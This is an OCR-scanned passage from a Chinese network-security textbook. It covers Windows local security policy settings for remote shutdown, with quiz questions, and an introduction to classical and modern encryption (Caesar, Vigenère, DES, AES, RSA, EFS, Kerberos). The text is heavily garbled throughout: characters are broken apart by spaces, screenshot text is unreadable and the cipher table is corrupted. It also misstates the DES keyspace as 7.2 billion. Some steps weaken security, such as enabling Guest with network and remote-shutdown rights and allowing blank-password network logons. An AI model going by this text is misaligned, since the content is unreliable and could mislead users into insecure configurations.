打开 “本 地 安全 策略 "窗口 ,展开 “安全 设置 ">“ 本 地 策略 >“ 用户 权 限 分 配 ” 节 点 , 双 
击 “ 从 远程 系统 强制 关机 ”选项 ,如 图 11-39 所 示 。 

在 弹出 的 对 话 框 中 显示 目前 只 有 Administrators 组 的 成 员 才 有 权 从 远程 关机 。 单 击 
对 话 框 下 方 的 “添加 用 户 或 组 ”按钮 ,然后 在 新 弹出 的 对 话 框 中 输入 Guest, 单 击 “ 确 定 ” 按 
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文件 扣 作 0 查看 W 帮助 0 
和 中 | 广 | 而 | 站 呈 | 日 本 

















Adninistrators, Back. 
Adninistrators 
LOCAL SERVICE, NETWOR, 


Adninistrators 


Adninistrators, Users 
he Guest, Adnin. 


LOCAL SERVICE, Aanini 
LOCAL SERVICE, Adnini 
Adninistrators, Users. 





图 11-39 从 远程 系统 强制 关机 


钮 。 通 过 上 述 操作 后 , 便 给 远程 计算 机 的 Guest 用 户 授予 了 远程 关机 的 权限 。 

下 面 分 3 种 情况 介绍 如 何 解决 “拒绝 访问 ”问题 。 

情况 一 : 两 台 计 算 机 均 使 用 Administrator 账号 且 均 没有 设置 密码 。 

解决 方法 : 禁用 “安全 设置 ">“ 本 地 策略 ”一 “安全 选项 ”中 的 “账户 : 使 用 空 密码 的 
本 地 账户 只 允许 进行 控制 台 登 录 ” 策 略 ,如 图 11-40 所 示 。 这 样 即 使 空 密码 的 账户 也 能 互 
相 访 问 了 。 


文件 名 扣 作 生硬 人 部 助 0 
和 中 | 六 | 四 | 日 吕 | 日 加 


刁 域 成 员 : 对 安全 通道 数据 进行 数字 签名 (各 果 可 能 ) 5 

贺 域 成 员 : 计算 机 账户 密码 最 长 使 用 期 限 

国 域 成 员 ; 禁用 计算 机 账户 密码 更 改 

国 域 成 员 ， 需 要 强 Windovs 2000 或 更 高 版 本 ) 会 话 密 钥 Bem 
没有 定义 














因 域 演 制 骂 : LDAP 服务 器 签名 要 求 
国 域 控制 器 : 拒绝 计算 机 账户 密码 更 改 
大 域 控制 器 : 允许 服务 器 操作 者 计划 任务 
巩 账 户 : 管理 员 账户 状态 

来 态 





图 11-40 ”使 空 密码 账号 能 互相 访问 


情况 二 : 两 台 计 算 机 均 设置 了 密码 ,但 提示 无 法 访问 。 

解决 方法 : 将 两 台 计 算 机 的 账号 和 密码 设置 为 相同 ,这 样 就 可 以 实现 远程 关机 了 。 

情况 三 : 两 台 计算 机 均 设置 了 密码 , 且 密 码 不 同 , 但 仍 希望 实现 远程 关机 。 

解决 方法 : 修改 “安全 设置 ">“ 本 地 策略 ”一 “安全 选项 ”中 的 “网 络 访问 : 本 地 账户 
的 共享 和 安全 模型 "策略 ,把 “经 典 ” 设 置 为 “ 仅 来 宾 ”, 如 图 11-41 所 示 。 把 “账户 : 来 宾 账 
户 状态 ”设置 为 “已 启用 ”, 把 “账户 : 重 命名 来 宾 账 户 ? 设 置 为 Guest, 如 图 11-42 所 示 。 修 
改 “ 本 地 策略 >“ 用户 权 限 分 配 ” 中 的 “从 网 络 访问 此 计算 机 ”策略 ,添加 Guest 账号 ,如 
图 11-43 所 示 。 然 后 从 “拒绝 从 网 络 访问 这 台 计 算 机 ”中 删除 Guest 账号 ,如 图 11-44 所 
示 ,才能 实现 Guest 账户 访问 局 域 网 中 的 计算 机 。 

















昆 本 地 安全 策略 
文件 中) 操作 ”查看 WM) 帮助 00 
所 中 | 方 加 | 
















限制 开山: 为 现 LI 身份 验证 添加 远 
人 允许 Localsysten NULL 会 话 回 退 没有 定义 
允许 本 地 系统 将 计算 机 标识 用 于 ITUI 。 ”没有 定义 
人 允许 对 该 计算 机 的 PKU2V 身份 验证 请 > X 
在 超过 登录 时 间 后 强制 注销 















加 用 户 权限 分 配 
己 安全 选 顺 

田 国 高 级 安全 Windows 防火 寺 
国 网 络 列表 管理 器 第 咯 

恒 公 居 策 略 


国 软件 限制 生 略 
国 应 用 程序 控制 第 赂 不 允许 sM 账户 和 共享 的 匿名 术 举 


国 网 络 访问 : 不 允许 存 仁 网 络 身份 愉 证 的 密码 和 任 据 。 已 禁用 
昌 量 于 安全 隐 在 本 地 计算 机 | 加 网络 访问 将 treryone 权限 应 用 于 医 名 用 户 已 划 用 “后 

























图 11-41 本 地 账户 的 共享 和 安全 模型 












文件 F) 操作 W) 查看 WM) 帮助 00 
和 中 | 页 加 | 其 国 辽 | 加 加 | 


央 域 成 员 : 禁用 计算 机 账户 密码 

成 员 : 需要 强 Windows 200. . ， 已 启用 

国 域 控制 器 : IDAP 服务 器 签名 要 求 

央 域 控制 器 : 拒绝 计算 机 账户 密 

国 域 控制 器 : 允许 服务 器 操作 者 
管 居 态 



































区 用 户 权限 分 配 
安全 选项 


田 国 高 级 安全 Windows 防火 墙 
国 网 络 列表 管理 器 策略 

国 公 钥 第 略 

田 国 软件 限制 第 略 


田 国 应 用 程序 控制 策略 
四 黑人 TP 守 全 剩 胺 ， 在 本 二 














‘ | 
: 使 用 空 密码 的 本 地 账户 .， 已 启用 
账户 ; 重 命名 来 宾 账 户 Guest 
国 账 户 : 重 命名 系统 管理 员 账户 。 Adninist 国 
上 


图 11-42 ”启用 来 宾 账户 

















文件 @) 操作 以) 查看 W) ”帮助 00 
CE dl eel 


剧 备 份 文件 和 目录 Administrators, Backup Operator 
国 创建 符号 榜 接 Adninistrators 

国 创 尘 全 局 对 象 LDCAL SERVICE, NETWORK SERVICE, 
创建 一 个 令 牌 对 象 

中 建 一 个 页 面 文件 Adninistrators 
























国 高 级 安全 Windows 防火 墙 
国 网 络 列表 管理 器 策略 

国 公 钥 第 略 

国 软件 限制 第 略 

国 应 用 程序 控制 第 略 

田 仿 安全 第 略 , 在 本 地 计算 机 

田园 高 级 审核 第 略 配 置 





Administrator: 












Guest, Adninistrators 
LOCAL SERVICE, Adninistrators' 局 
可 












图 11-43 人 允许 从 网 络 访问 此 计算 机 
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国安 全 选项 
田 国 高 级 安全 Windows 防火 寺 
国 网 络 列表 管理 器 策略 

田 国 公 钥 弟 略 

田 国 软件 限制 第 略 

田 国 应 用 程序 控制 第 梧 

田 电 王 安全 第 略 , 在 本 地 计算 机 
状 高 织 审 核 策略 配 置 








图 11-44 拒绝 从 网 络 访问 这 台 计 算 机 


如 果 以 上 3 种 情况 还 未 解决 远程 关机 产生 的 “拒绝 访问 ”问题 ,重启 两 台 计 算 机 后 设 
置 即 可 生效 。 在 等 待 关机 的 时 间 里 ,用 户 还 可 以 执行 其 他 的 任务 ,如 关闭 程序 .打开 文件 
等 ,但 无 法 关闭 该 对 话 框 ,除非 用 shutdown -a 命令 来 中 止 关机 任务 。 


11.5 常见 问题 解答 


匿名 用 户 的 作用 是 什么 ? 

答 : Windows 允许 匿名 用 户 执行 某 些 操作 , 比如 列举 域 账 户 和 网 络 共享 名 。 例 如 当 
用 户 要 给 一 个 不 需要 维护 互相 信任 关系 的 信任 域 中 的 用 户 进行 访问 授权 时 ,这 是 非常 方 
便 的 。 默 认 情况 下 ,匿名 用 户 具 有 与 授予 Everyone 组 中 的 用 户 访 问 特定 资源 相同 的 访问 


权限 。 
11.6 认证 试题 

一 、 选 择 题 

1. 若 在 Windows “运行 窗 口中 输入 ( ) 命 令 , 则 可 运行 Microsoft 管理 控制 台 。 
A. cmd B. mmec C. autoexe D. tty 

2. 利用 组 策略 设置 账户 锁定 ,可 以 防止 ) 。 
A. 木马 B. 暴力 攻击 
C. IP 欺骗 D. 缓冲 区 溢出 攻击 


3，Windows Server 2012 系统 的 安全 日 志 通 过 ( ) 设 置 。 
A. 事件 查看 器 B. 服务 管理 器 C. 本 地 安全 策略 ” D. 网 络 适配器 
4. 用 户 匿名 登录 主机 时 ,用 户 名 为 ( Y's 


A. Guest B. Administrator ~ C. Admin D. Anonymous 


5. 为 保护 计算 机 信息 安全 ,通常 只 允许 用 户 在 输入 正确 的 ( ) 时 进入 系统 。 
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站 用户 各 B. 命令 C. 密码 D. 密 钥 
6. 在 保护 密码 安全 中 ,采取 措施 不 正确 的 是 ( ) 

A. 不 用 生日 或 电话 号 码 做 密码 B. 不 使 用 位 数 过 少 的 密码 

C. 不 使 用 纯 字母 或 纯 数字 做 密码 D. 不 使 用 声音 或 指纹 做 密码 
二 、 操 作 题 


1. 如 何 利用 组 策略 设置 “不 允许 SAM 账户 匿名 枚 举 ”? 
2. 如 何 利 用 组 策略 设置 用 户 权 限 ? 


12.1 用 户 需 求 与 分 析 


在 实际 工作 中 ,企业 人 员 经 常 要 利用 互联 网 将 一 些 重要 文档 传送 给 自己 的 客户 或 企 
业 总 部 ,但 是 互联 网 上 存在 很 多 不 安全 因素 ,如 何 对 重要 文档 进行 机 密 性 保护 是 重点 要 考 
虑 的 因素 。TCP/IP 协议 是 目前 使 用 最 为 广泛 的 网 络 互联 协议 ,但 TCP/IP 协议 本 身 存 
在 很 多 安全 性 问题 ,如 何 利用 不 安全 的 TCP/IP 协议 实现 对 数据 的 安全 传输 呢 , 最 有 效 的 
方法 就 是 对 要 传输 的 数据 进行 加 密 后 再 传输 。 因 此 ,作为 网 络 安全 管理 与 维护 人 员 ,要 掌 
握 数 据 的 加 密 技术 与 方法 ,并 能 运用 主流 的 加 密 与 防护 技术 为 企业 的 商业 机 密 数 据 提供 
保护 。 


12.2 预备 知识 


加 密 是 对 数据 进行 编码 ,使 其 成 为 一 种 按 常规 不 可 理解 的 形式 , 即 密 文 。 解 密 是 加 密 
的 逆 过 程 ,即将 密 文 还 原 成 可 以 理解 的 形式 。 数据 加 密 技术 的 关键 是 加 密 算法 和 密 钥 。 
加 密 算法 是 一 组 指令 或 一 个 数学 公式 , 密 钥 则 是 算法 中 的 可 变 参 数 。 同 一 明文 使 用 不 同 
的 加 密 算法 ,或 使 用 相同 的 加 密 算 法 ,但 不 同 的 密 钥 ,都 会 得 出 不 同 的 密 文 。 衡 量 一 个 加 
密 算法 的 可 靠 性 ,主要 取决 于 解密 的 难度 ,而 这 与 密 钥 长 度 有 关 。 目 前 广泛 应 用 的 加 密 技 
术 有 两 种 ,对 称 密 钥 加 密 算 法 和 非 对 称 密 钥 加 密 算法 ,也 称 为 私 钥 加 密 算法 和 公 钥 加 密 
算法 。 


也 2 1 对 称 加 密 算法 及 其 应 用 


对 称 加 密 也 称 为 私 钥 加 密 体 制 。 对 称 密 钥 加 密 技术 使 用 相同 的 密 钥 对 数据 进行 加 密 
和 解密 ,发 送 者 和 接收 者 使 用 相同 密 钥 。 现 在 对 称 加 密 算法 已 经 有 很 多 ,通过 特殊 的 数学 
算法 实现 强度 增加 ,包括 DES 算法 IDEA 算法 .3DES 算法 .AES 算法 .AED 算法 、RC2 
算法 .RC4 算法 .RC5 算法 、Skipjack 算法 和 Blowfish 算法 等 。 下 面 从 古典 对 称 加 密 算法 
开始 介绍 对 称 加 密 算法 。 











1. 古典 对 称 加 密 算 法 


古典 对 称 加 密 算 法 分 为 蔡 代 密码 和 换 位 密码 两 种 。 蔡 代 密 码 是 把 明文 中 每 一 个 字符 
替换 成 密 文 中 的 另外 一 个 字符 。 换 位 密码 的 字符 没有 被 蔡 换 而 只 是 交换 位 置 。 

1) 恺 撤 密码 

已 撤 南 征 北 战 ,几乎 统一 了 欧洲 , 莫 定 了 罗马 帝国 。 恺 撒 较 早 将 此 加 密 算法 用 于 战争 
通信 ,用 来 保护 重要 军情 ,因此 这 种 加 密 方法 被 称 为 恺 撤 密码 。 恺 撤 密 码 的 思想 是 将 字母 
按 顺 序 推 后 3 位 从 而 起 到 加 密 作 用 ,产生 的 明 密 对 照 表 如 表 12-1 所 示 。 


表 12-1 恺 撒 密码 本 
明文 AlBlclplelrlcln|itli|riiiv Nlolrlalrl srlu 





可 


xj|Y| z 
密 文 |D|E|FlclalrlrIlklzlxNlolplalRlslTlolvlwlxlrlzlaAlalc 














例如 ,信息 “START WAR” 用 已 撒 密码 加 密 后 就 变 成 了 “VWDUW ZDU”, 这 样 加 密 
后 的 信息 即使 被 敌 方 截获 ,也 不 会 泄密 。 这 种 按 字母 顺序 后 移 的 加 密 算法 ,3 是 加 密 的 密 
钥 。 如 果 改 变 加 密 密 钥 , 明 密 对 照 表 也 会 发 生 改 变 , 比如 把 加 密 密 钥 改 成 5, 则 明文 
“STOP” 转 换 成 密 文 就 是 *XYTU”。 显 然 , 这 种 密码 的 加 密 强度 是 很 低 的 ,只 需要 简单 统 
计 字 母 频 率 就 可 以 破译 。 

2) 费 杰 尔 密码 

费 杰 尔 密码 使 用 多 表 蔡 换 技术 ,加密 时 以 明文 字母 指 行 ,以 密 钥 字母 指 列 ,行列 交叉 
的 就 是 密 文字 母 ,解密 时 ,以 密 钥 字母 选择 列 ,从 该 列 中 找到 密 文字 母 ,那么 该 密 文字 母 所 
在 行 的 行 字母 就 是 明文 字母 ,如 表 12-2 所 示 。 
表 12-2 费 杰 尔 密码 本 









































A|IB|ICIDIE|IFIG IIJIKILIMINIOIPIQIRIS|ITIUIVIWIX|IY|Z 
BICIDIEIFIGIHITIJTIKILIMINIOIPIQIRIS|ITIUIVIWIXIYIZIA 
CIDIEIFIGIHITIJIKIEIMINIOIPIQIRISITIUIVIWIXIYIZIAIB 
DIEIFIGIHIT|IJIKILIMINIOIPIQIRISITIUIVIWIXIY|IZIAIBIC 
EIFIGIHIIT|IJIKILIMINIO|IPIQIRISITIUIVIW|IX|IY|IZIAIB|ICID 
FIGIHII|IJIKILIMINIOIPIQIRIS|ITIUIVIWIXIY|IZIAIBICIDIE 
GIHIYTITIKILIMINIOIPIQIRISITIUI VIWIX|I YIZIAIBICIDIEIF 
HIIIJIKILIMINIO|IPIQIRISITIUIVIWIXIY|IZIAIBICIDIE|IF|IG 
IIJIKILIMINIOIPIQIRISITIUIVIWIXIY|IZIAIBICIDIE|IFIGIH 
JIKILIMINIOIPIQIRISITIUIVIWIX|IYIZIAIBICIDIEIFIGIHII 
KILIMINIOIPIQIRISITIU|IVIWIX|IY|IZIAIBICIDIEIFIG|IHII|J 
LIMINIOIPIQIR|ISITIUIVIWIX|IY|IZIAIBICIDIE|IFIG|IH|IIIJIK 
MINIOIPIQIRISITIUIVIWIXI YIZIAIBICIDIEIFIGIHIEITIEKIL 
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续 表 
NIOIPIQIRISITIUIVIWIXIYIZIAIBICIDIE|IFIGIHITIJIKILIM 
OlPIQIRISITIUIVIWIX|IYIZIAIBICIDIEIFIG|IHIT|IJIKILIMIN 
PIQIRISITIUIVIWIXIYIZIAIBICIDIEIFIGIHITITIKILIMINIO 
QIRISITIUIVIWIXIYIZIAIBICIDIEIFIGIHI TIJTIKILIMINIO|IP 
RISITIUVUIVIWIXIYIZIAIBICIDIEIFIGIHITIJIKILIMINIOIPIQ 
SITIUIVIWIXIYIZIAIBICIDIEIFIGIHITIJIKILIMINIOIPIQIR 
TIUIVIWIXEIYIZIAIBICIDIEIFPFIGIHILTITIKILIMINIO PIQ| RI'S 
UIVIWIXIYIZIAIBICIDIEIFIGIHITIJIKILIMINIO|IPIQIRISIT 
WIEIYIZIALBICTIDIEIFIG RI TITIRELLMNIOLPI AIRISITIU 
WIXIYIZIAIBICIDIEIFIGIHITISIKIELIMINIOIPIQIRISITIUIV 
XIYIZIAIBICIDIEIFIGIHITIJTJIKILIMINIOIPIQIRISITIUIVIV 
YIZ|IAIBICIDIEIFIGIHITIJTIKILIMINIOIPIQIRIS|ITIUVUIVIVWIX 
ZIAIBICIDIE FIGIH TIKILIMINIOIPIOQ RISITIUIVYIWISI YY 



















































































例 12-1 明文 是 *SHUNDE”、 密 钥 是 “NET” 的 密 文 是 什么 呢 ? 

解 : 该 题目 是 已 知 明文 密 钥 求 密 文 。 加 密 时 以 明文 字母 指 行 ,以 密 钥 字 母 指 列 , 行 
列 交叉 的 就 是 密 文字 母 。 

明文 :SHUNDE 

密 钥 : NETN ET 

密 文 :FLNAHX 

因为 , 密 钥 的 位 数 与 明文 保持 一 致 ,位 数 不 够 时 重复 密 钥 字母 。 通 过 查看 费 杰 尔 密码 
本 发 现 ,第 “S" 行 .第 *N? 列 对 应 的 字母 是 “F” 字 母 , 因 此 第 一 个 密 文 就 是 "F”, 第 “H” 行 、 第 
“E” 列 对 应 的 字母 是 *L" 字 母 ,因此 第 二 个 密 文 就 是 *L”, 同 理 可 以 看 出 第 三 个 密 文字 母 是 
“N”, 第 四 、 五 ,六 个 密 文 字母 分 别 是 “*A”“H”*X”。 因 此 ,明文 是 *SHUNDE”、 密 钥 是 
“NET” 的 密 文 是 “FLNAHX”。 

例 12-2 写 出 密 钥 是 “NET” 的 密 文 “YSOR” 的 明文 。 

解 :该 题目 是 已 知 密 文 、 密 钥 求 明文 。 解 密 时 ,以 密 钥 字母 选择 列 , 从 该 列 中 找到 密 文 
字母 ,那么 该 密 文字 母 所 在 行 的 行 字 母 就 是 明文 字母 。 

密 钥 : NETN 

密 文 : YSOR 

明文 : LOVE 

因为 , 密 钥 的 位 数 与 明文 保持 一 致 ,位 数 不 够 时 重复 密 钥 字母 。 通 过 查看 费 杰 尔 密码 
本 发 现 ,第 “N” 列 中 的 “Y” 字 母 对 应 的 行 字母 是 *L”, 因 此 第 一 个 明文 字母 就 是 *L”; 第 
“E” 列 中 的 “S” 字 母 对 应 的 行 字 母 是 *O”, 因 此 第 二 个 明文 字母 就 是 *O”; 第 “T” 列 中 的 
“0O” 字 母 对 应 的 行 字 母 是 *V”, 因 此 第 三 个 明文 字母 就 是 *V”; 第 “N” 列 中 的 “R” 字 母 对 
应 的 行 字 母 是 *E”。 因 此 第 四 个 明文 字母 就 是 *E”。 因 此 密 钥 是 “NET” 的 “YSOR” 密 文 
的 含义 是 “LOVE”。 

3) 换 位 密码 技术 

将 明文 按 行 排列 在 一 个 矩阵 中 ,如 果 最 后 一 行 不 全 ,可 以 用 A、B、C…… (或 a、b、 








c……) 填 充 ,然后 按照 密 钥 各 个 字母 大 小 的 顺序 排出 列 号 ,以 列 的 顺序 将 矩阵 中 的 字母 读 
出 ,就 构成 密 文 。 
例 12-3 ”明文 是 “can you understand”、 密 钥 是 “able” 的 密 文 是 什么 ? 
解 : 密 钥 : able 
顺序 ,1 24 3 
填充 :cany 
ouun 
ders 
tand 


按照 1 .2、3、4 的 顺序 排序 得 到 的 密 文 内 容 是 “codt auea ynsd nurn”。 
2. 现代 对 称 加 密 算 法 


1) 对 称 密 钥 加 密 技 术 的 典型 算法 DES 

DES(Data Encryption Standard, 数 据 加 密 标 准 ) 是 一 种 对 称 密 钥 加 密 算法 , 它 是 由 
IBM 公司 在 20 世纪 70 年 代 发 明 的 ,于 1977 年 被 美国 国家 技术 标准 局 (NIST) 批 准 作为 
非 机 要 部 分 使 用 的 数据 加 密 标 准 。 在 国内 ,DES 算法 在 POS、ATM 磁卡 及 智能 卡 (IC 
卡 ) .加油 站 ,高 速 公 路 收费 站 等 领域 被 广泛 应 用 ,实现 关键 数据 的 保密 。 

DES 的 加 密 算法 是 公开 的 ,保密 性 取决 于 对 密 钥 的 保密 。DES 是 一 个 分 组 加 密 算 
法 ,分 组 长 度 为 64 位 , 密 钥 长 度 为 56 位 , 密 钥 是 任意 的 56 位 数 。 就 目前 计算 机 的 计算 能 
力 而 言 ,DES 不 能 抵抗 对 密 钥 的 穷 举 搜索 攻击 ,56 位 的 密 钥 穷 举 数量 是 72 亿 次 。 

2) 对 称 密 钥 加 密 技术 的 典型 算法 3DES 

三 重 DES(3DES) 是 DES 的 增强 型 ,能 有 效 运 行 168 位 密码 。 

3) 对 称 密 钥 加 密 技术 的 典型 算法 IDEA 

IDEA(International Data Encryption Algorithm, 国际 数据 加 密 算 法 ) 是 一 个 迭代 分 
组 密码 ,分 组 长 度 是 64 位 , 密 钥 长 度 为 128 位 。 

4) 对 称 密 钥 加 密 技术 的 典型 算法 AES 

为 了 替换 安全 性 逐渐 减弱 的 DES 算法 ,2001 年 11 月 NIST 公布 Rijndael 数据 加 密 
算法 作为 高 级 加 密 标 准 AES, AES 的 密 钥 长 度 可 变 ,可 以 为 128 位 、192 位 或 256 位 , 数 
据 分 组 长 度 也 可 以 指定 为 这 3 种 。AES 的 强度 至 少 和 3DES 一 样 ,但 比 3DES 更 快 。 


3. 对 称 加 密 算法 的 特点 


对 称 加 密 算法 的 优点 是 加 密 处 理 简 单 , 加 密 解 密 速度 快 ,硬件 加 密实 现 较 容易 ,成 本 也 
较 低 。 例 如 思科 VPN 集中 器 高 端 产品 采用 的 是 硬件 加 密 , 低 端 产品 采用 的 是 软件 加 密 。 对 
称 加 密 算法 的 缺点 是 密 钥 管理 困难 ,无 法 实施 身份 源 认 证 。 比 如 及 个 用 户 想 实现 两 两 加 
密 通信 ,每 一 方 至 少 要 保管 一 1 个 密 钥 , 当 用 户 量 增多 时 ,需要 保管 的 密 钥 数 更 多 。 


也 22 非 对 称 加 密 算法 及 其 应 用 
非 对 称 加 密 算 法 又 称 为 公 钥 和 私 钥 算法 ,其 特点 是 加 密 和 解密 使 用 不 同 的 密 钥 。 发 
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送 端 用 接收 端的 公 钥 加 密 后 发 给 接收 端 ,接收 端 用 自己 的 私 钥 解 密 。 也 就 是 说 用 公 钥 加 
密 的 信息 只 能 用 与 该 公 钥 配 对 的 私 钥 才 能 解密 ,用 私 钥 加 密 的 信息 只 能 用 与 给 私 钥 配 对 
的 公 钥 才能 解密 ,实现 了 对 源 的 身份 认证 。 因 此 , 非 对 称 加 密 算法 的 用 途 有 两 个 : 一 是 发 
送 保 密 信息 ,不 知道 接收 者 私 钥 则 无 法 窃取 信息 ; 二 是 确认 发 送 者 的 身份 ,别人 不 知道 发 
送 者 的 私 钥 , 无 法 发 出 能 用 其 公 钥 解密 的 信息 ,因此 发 送 者 无 法 抵赖 。 目 前 主要 的 非 对 称 
密 钥 算法 ( 公 钥 算法 ) 包 括 : RSA 算法 .DSA 算法 .PKCS 算 法 和 PGP 算法 等 。 


1. 常见 的 非 对 称 加 密 技术 的 典型 算法 





1) 非 对 称 加 密 技术 的 典型 算法 RSA 

RSA 算法 是 以 其 发 明 者 Ron Rivest、Adi Shamir 和 Leonard Adleman 的 名 字 首 字母 
命名 的 ,该 算法 基于 欧 拉 定理 ,经 常 应 用 于 数字 签名 、 密 钥 管 理 和 身份 认证 等 方面 ,适用 于 
数字 签名 和 密 钥 交 换 。 

2) 非 对 称 加 密 技 术 的 典型 算法 DSA 

DSA(Digital Signature Algorithm) 算 法 仅 适用 于 数字 签名 ,路 由 器 配置 VPN 中 常 
用 的 非 对 称 加 密 算法 主要 是 RSA 和 DEA。 这 两 种 算法 主要 用 于 数字 签名 , 即 进行 源 认 
证 ,根本 原理 是 私 钥 加 密 签 名 ,对 应 的 公 钥 进行 验证 。 


2. 非 对 称 加 密 算法 的 特点 


非 对 称 加 密 算法 的 优点 是 解决 了 密 钥 管理 问题 ,通过 特有 的 密 钥 分 发 算法 ,使 当前 用 
户 数 大 幅度 增加 时 , 密 钥 数 增加 也 不 会 很 离谱 。 由 于 密 钥 事 先 已 经 分 配 , 不 需要 在 通信 过 
程 中 传输 ,其 安全 性 大 大 提高 。 它 还 具有 很 高 的 加 密 强 度 。 

非 对 称 加 密 算法 的 缺点 是 加 密 算法 复杂 ,加 密 、 解 密 的 速度 很 慢 。 


3. 非 对 称 加 密 算法 工具 软件 PGP 


PGP(Pretty Good Privacy) 是 信息 安全 传输 领域 的 加 密 软件 ,技术 上 采用 了 非 对 称 
的 公 钥 和 私 钥 加 密 算 法 。 软 件 的 主要 对 象 为 具有 一 定 商业 机 密 的 企业 ,政府 机 构 、 信 息 安 
全 工作 室 。PGP 最 初 的 设计 主要 是 用 于 邮件 加 密 , 如 今 已 经 发 展 到 可 以 加 密 文件 ,文件 
夹 ,分 区 ,硬盘 ,甚至 对 聊天 信息 进行 实时 加 密 , 只 要 双方 都 安装 了 PGP, 就 可 以 在 聊天 的 
同时 进行 加 密 或 解密 ,以 保证 聊天 信息 不 被 窃取 或 监视 。 


人 23 对 称 加 密 和 非 对 称 加 密 算法 的 对 比 


对 称 加 密 算 法 具有 加 密 速 度 快 .运行 时 占用 资源 少 等 特点 ; 非 对 称 加 密 算 法 可 以 用 
于 密 钥 交换 , 密 钥 管理 安全 。 通 常 并 不 直接 使 用 非 对 称 加 密 技 术 ,因为 非 对 称 加 密 算法 的 
处 理 速 度 慢 很 多 , 当 有 大 量 数据 要 进行 加 密 处 理 时 会 降低 数据 的 传输 速率 ,但 用 非 对 称 加 
密 算法 加 密 一 个 对 称 密 钥 还 是 很 快 的 。 

常见 的 密 钥 分 发 技术 有 CA (Certificate Authority) 技 术 和 KDC (Key Distribution 
Center) 技 术 。CA 技术 用 于 公 钥 和 对 称 密 钥 的 分 发 ,KDC 技术 用 于 对 称 密 钥 的 分 发 。 

EFS(Encrypting File System) 加 密 文件 系统 是 Windows 系统 特有 的 实用 功能 ,对 于 











NTFS 卷 上 的 文件 和 数据 ,都 可 以 直接 加 密 保 存 。EFS 使 用 扩展 的 数据 加 密 标 准 
(DESX)56 位 加 密 算法 。 加 密 的 方法 是 右 击 NTFS 分 区 中 的 一 个 文件 ,选择 “属性 ”命令 ， 
在 出 现 的 对 话 框 中 单 击 “ 常 规 ” 选 项 卡 , 然 后 单 击 “ 高 级 ”按钮 ,在 出 现 的 对 话 框 中 选择 “加 
密 内 存 以 便 保护 数据 ”选项 , 单 击 “ 确 定 ” 按 钮 。 

也 可 使 用 cipher 命令 ,显示 或 更 改 NTFS 分 区 上 的 文件 的 加 密 。 例 如 ,如 果 想 加 密 
C 盘 下 的 GL 文件 夹 ,就 输入 ; cipher /e C:\GL。 解 密 时 则 输入 : cipher /d C:\GL。 

EFS 基于 非 对 称 公 钥 算 法 和 对 称 公 钥 算 法 的 混合 算法 保护 文件 。 文 件 使 用 对 称 算 
法 加 密 ,文件 的 加 密 密 钥 使 用 用 户 证 书 的 公 钥 加 密 ,并 与 加 密 的 文件 一 起 存储 。 用 户 的 私 
钥 可 解密 出 文件 的 加 密 密 钥 ,然后 解密 文件 。 

为 了 保证 数据 的 安全 ,最 好 能 在 加 密 文 件 之 后 立即 将 自己 的 密 钥 备份 出 来 ,特别 是 在 
系统 重 装 之 前 一 定 要 进行 如 下 操作 。 在 Windows 7 中 , 按 Win 十 R 组 合 键 ,弹出 “运行 ” 
对 话 框 ,输入 certmgr. msc, 按 Enter 键 后 ,在 出 现 的 “证 书 ” 对 话 框 中 展开 “证 书 ”>“ 当 前 
用 户 ”>* 个 人 ”一 “证 书 ” 节 点 ,可 以 看 到 一 个 以 当前 的 用 户 名 为 名 称 的 证 书 。 布 击 该 证 
书 , 选 择 “ 所 有 任务 ”一 “导出 "命令 ,并 选择 “导出 私 钥 ”, 导 出 的 证 书 将 是 一 个 以 . pfx 为 扩 
展 名 的 文件 。 当 用 户 的 密 钥 丢失 后 ,如 重 装 了 操作 系统 ,或 者 无 意 中 删 除了 某 个 账号 ,只 
要 找到 之 前 导出 的 . pfx 文件 , 右 击 ,并 选择 “安装 Pfx” 命 令 , 之 后 弹出 导入 向 导 , 按 照 导入 
向 导 的 指示 完成 操作 ,之 前 加 密 的 数据 可 以 全 部 正确 打开 。 注 意 ,如 果 之 前 在 导出 证 书 时 
选择 了 用 密码 保护 证 书 , 在 导入 这 个 证 书 时 就 需要 提供 正确 的 密码 ,否则 将 不 能 继续 。 

目前 已 经 出 现 了 EFS 加 密 的 破解 软件 Advanced EFS Data Recovery(AEDR) ,破解 
率 很 高 。 但 这 对 于 重 装 C 盘 系统 后 的 情况 不 适用 ,因为 它 破解 的 前 提 是 私 钥 在 当前 主机 
系统 的 硬盘 中 存在 ,或 者 有 备份 。 需 要 注意 的 是 ,因为 EFS 的 高 安全 性 ,如 果 用 户 操作 不 
当 则 很 可 能 导致 数据 丢失 。 


忆 24 验证 技术 


验证 是 为 了 防止 恶意 者 的 主动 攻击 ,包括 检验 信息 的 真 伪 及 防止 信息 在 通信 过 程 中 
被 算 改 、 删 除 、 插 入 伪装、 延迟 和 重 放 等 。 验 证 主要 包括 3 个 方面 : 消息 验证 、 数 字 签 名 
和 身份 验证 。 消 息 验证 是 指 验证 所 收 到 的 消息 确实 是 来 自 真 正 的 发 送 方 并 且 是 未 被 修改 
过 的 ,也 可 以 验证 消息 的 顺序 和 及 时 性 。 消 息 验 证 不 一 定 是 实时 的 ,如 存储 系统 和 电子 邮 
件 系统 。 身 份 验 证 用 于 鉴别 用 户 的 身份 是 否 是 合法 用 户 。 常 用 方法 包括 : 密码 验证 、 持 
证 验证 和 生物 识别 。 国 际 电信 联盟 (ITU) 和 IETF 制定 了 验证 中 心 的 标准 ITU X. 509 。 

账户 名 /密码 验证 方式 是 被 广泛 研究 和 使 用 的 一 种 身份 验证 方法 ,也 是 验证 系统 所 依 
赖 的 一 种 最 实用 的 机 制 ,常用 于 操作 系统 登录 、Telnet 等 。 常 用 的 身份 验证 协议 主要 有 
一 次 一 密 机 制 .X. 509 验证 协议 .Kerberos 验证 协议 等 。Kerberos 是 为 TCP/IP 网 络 设 
计 的 可 信 第 三 方 鉴别 协议 。Kerberos 基于 对 称 密 钥 机 制 ,一 般 采用 DES 算法 ,但 也 可 以 
采用 其 他 算法 。 在 Kerberos 模型 中 .实体 是 位 于 网 络 上 的 客户 机 和 服务 器 。 客 户 机 可 以 
是 用 户 ,也 可 以 是 处 理事 务 所 需要 的 独立 的 软件 程序 。Kerberos 有 一 个 存 有 所 有 用 户 秘 
密 密 钥 的 数据 库 。 对 于 每 个 用 户 而 言 ,秘密 密 钥 是 一 个 加 密 以 后 的 用 户 密 码 。Kerberos 
能 提供 会 话 密 钥 ,只 供 一 台 客 户 机 和 一 台 服 务 器 (或 两 台 客户 机 之 间 ) 使 用 。 会 话 密 钥 用 
